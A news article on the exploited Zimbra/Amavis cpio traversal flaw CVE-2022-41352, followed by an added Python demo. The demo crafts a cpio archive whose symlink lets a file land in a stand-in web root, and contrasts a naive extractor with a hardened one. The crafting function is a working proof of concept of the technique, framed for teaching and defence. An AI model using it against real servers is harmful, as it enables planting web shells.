An unpatched code-execution vulnerability in the Zimbra Collaboration software is under active exploitation by attackers who are using it to backdoor servers.
The attacks began no later than September 7. A few days later, a Zimbra customer reported that a server running Amavis, the spam-filtering engine bundled with Zimbra, had processed an email carrying a malicious archive attachment. Within seconds, the scanner's extraction of that archive wrote a malicious Java file into the server's web root, where the web server executed it on request. With that, the attackers had installed a web shell, which they could then use to log in to and take control of the server.
Zimbra has yet to release a patch fixing the vulnerability. Instead, the company published guidance advising customers to ensure that the file archiver pax is installed. When pax is absent, Amavis unpacks incoming attachments with cpio, an alternate archiver with a known directory-traversal vulnerability that was never fixed.
"If the pax package is not installed, Amavis will fall back to using cpio," Zimbra employee Barry de Graaff wrote. "Unfortunately the fall-back is implemented poorly (by Amavis) and will allow an unauthenticated attacker to create and overwrite files on the Zimbra server, including the Zimbra webroot."
The post went on to explain how to install pax. The utility is installed by default on Ubuntu but must be installed manually on most other Linux distributions. The Zimbra vulnerability is tracked as CVE-2022-41352.
The zero-day vulnerability is a byproduct of CVE-2015-1197, a known directory-traversal vulnerability in cpio. Researchers at security firm Rapid7 said recently that the flaw is exploitable only when Zimbra or another application uses cpio to extract untrusted archives.
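To make the cpio-side mechanism concrete, here is an added Python example that is not part of the original article and is not Zimbra's, Amavis's or cpio's own code. It builds a small cpio archive in the newc format containing a symlink that points out of the extraction directory followed by a regular file whose path passes through that symlink, which is the directory-traversal pattern of CVE-2015-1197. A naive extractor follows the link and writes the file outside its destination; a hardened extractor resolves every parent directory and link target and refuses anything that escapes. The directory names (`zimbra_webroot`, `amavis_tmp_*`), the placeholder file content and both extractors are constructed for the illustration, and no real cpio binary is invoked.

```python
"""Added example (not Zimbra, Amavis or cpio code): the symlink traversal behind CVE-2015-1197."""
import io
import os
import stat
import tempfile
NEWC_MAGIC = b"070701"   # "new ASCII" cpio format: 110-byte header, 4-byte alignment
TRAILER = "TRAILER!!!"   # name of the entry that ends an archive


def _pad4(n):
    return (-n) % 4   # padding bytes that round n up to a multiple of 4


def build_newc(entries):
    """Serialise [(name, mode, data)] as newc cpio; for a symlink, data is its target."""
    out = io.BytesIO()
    for ino, (name, mode, data) in enumerate(entries + [(TRAILER, 0, b"")], start=1):
        name_b = name.encode() + b"\0"
        # ino mode uid gid nlink mtime filesize devmaj devmin rdevmaj rdevmin namesize check
        fields = [ino, mode, 0, 0, 1, 0, len(data), 0, 0, 0, 0, len(name_b), 0]
        hdr = NEWC_MAGIC + b"".join(f"{v:08x}".encode() for v in fields)
        out.write(hdr + name_b + b"\0" * _pad4(len(hdr) + len(name_b)))
        out.write(data + b"\0" * _pad4(len(data)))
    return out.getvalue()


def parse_newc(blob):
    """Yield (name, mode, data) for every entry up to the trailer."""
    pos = 0
    while True:
        hdr = blob[pos:pos + 110]
        if hdr[:6] != NEWC_MAGIC:
            raise ValueError("bad newc magic at offset %d" % pos)
        # 13 fields of 8 hex chars; we need mode (1), filesize (6) and namesize (11)
        mode, size, namesize = (int(hdr[6 + 8 * i:14 + 8 * i], 16) for i in (1, 6, 11))
        name = blob[pos + 110:pos + 110 + namesize - 1].decode()
        pos += 110 + namesize + _pad4(110 + namesize)
        data = blob[pos:pos + size]
        pos += size + _pad4(size)
        if name == TRAILER:
            return
        yield name, mode, data


def craft_archive(outside_dir):
    """Constructed attacker archive: a symlink out of the extraction dir, then a file through it."""
    marker = b"<%-- constructed marker; a real attack drops a JSP web shell here --%>"
    return build_newc([
        ("attach", stat.S_IFLNK | 0o777, outside_dir.encode()),
        ("attach/shell.jsp", stat.S_IFREG | 0o644, marker),
    ])


def naive_extract(blob, dest):
    """Extractor with the CVE-2015-1197 behaviour: trusts names and follows symlinks."""
    for name, mode, data in parse_newc(blob):
        path = os.path.join(dest, name)
        os.makedirs(os.path.dirname(path), exist_ok=True)   # dest/attach already -> outside_dir
        if stat.S_ISLNK(mode):
            os.symlink(data.decode(), path)
        else:
            with open(path, "wb") as f:   # opens through the symlink, lands in outside_dir
                f.write(data)


def _inside(root, candidate):
    return os.path.commonpath([root, os.path.realpath(candidate)]) == root


def safe_extract(blob, dest):
    """Hardened extractor: no absolute or '..' names; parents and link targets must resolve under dest."""
    root = os.path.realpath(dest)
    written = []
    for name, mode, data in parse_newc(blob):
        if name.startswith("/") or ".." in name.split("/"):
            raise ValueError("rejected traversal name %r" % name)
        path = os.path.join(root, name)
        if not _inside(root, os.path.dirname(path)):
            raise ValueError("rejected %r: parent resolves outside destination" % name)
        if stat.S_ISLNK(mode):
            target = data.decode()
            if not _inside(root, os.path.join(os.path.dirname(path), target)):
                raise ValueError("rejected symlink %r -> %r" % (name, target))
            os.symlink(target, path)
        else:
            os.makedirs(os.path.dirname(path), exist_ok=True)
            with open(path, "wb") as f:
                f.write(data)
        written.append(path)
    return written


def demo():
    with tempfile.TemporaryDirectory() as work:
        webroot = os.path.join(work, "zimbra_webroot")   # stand-in for Zimbra's real web root
        naive_dest, safe_dest = os.path.join(work, "amavis_tmp_naive"), os.path.join(work, "amavis_tmp_safe")
        for d in (webroot, naive_dest, safe_dest):
            os.mkdir(d)
        archive = craft_archive(webroot)
        naive_extract(archive, naive_dest)
        try:
            safe_extract(archive, safe_dest)
            blocked = False
        except ValueError:
            blocked = True
        benign = build_newc([("clean.txt", stat.S_IFREG | 0o644, b"hello")])
        return {
            "naive_wrote_outside": os.path.isfile(os.path.join(webroot, "shell.jsp")),
            "safe_rejected": blocked,
            "safe_extracted_benign": len(safe_extract(benign, safe_dest)) == 1,
        }
```

Running `demo()` reports that the naive extractor dropped `shell.jsp` into the stand-in web root while the hardened one rejected the archive at the symlink entry and still extracted an ordinary file. The check that matters is resolving each parent directory with `realpath` before writing: the `..` and absolute-name filters alone do not catch a traversal that routes through a symlink the archive itself created moments earlier.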